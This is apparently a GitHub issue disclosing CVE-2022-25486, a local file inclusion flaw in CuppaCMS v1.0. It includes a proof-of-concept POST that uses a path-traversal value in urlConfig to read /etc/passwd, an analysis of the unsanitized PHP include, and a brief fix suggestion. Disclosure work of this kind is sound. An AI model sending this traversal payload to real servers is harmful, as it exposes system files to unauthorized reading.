Headline
CVE-2022-25486: Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php · Issue #25 · CuppaCMS/CuppaCMS
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip
poc
POST /alerts/alertConfigField.php
urlConfig=../../../../../../../../../../../../../../etc/passwd
analysis
location: /alerts/alertConfigField.php line 77
<?php include "…/components/table_manager/fields/config/".@$cuppa->POST(“urlConfig”); ?>
and $cuppa->POST
// post
public function POST($string){
return $this->sanitizeString(@$_POST[$string]);
}
go on
public function sanitizeString($string){
return htmlspecialchars(trim(@$string));
}
so the post urlConfig without any lfi protected filter
Repair suggestions
you can check urlConfig ,for example check if it has … then refuse this request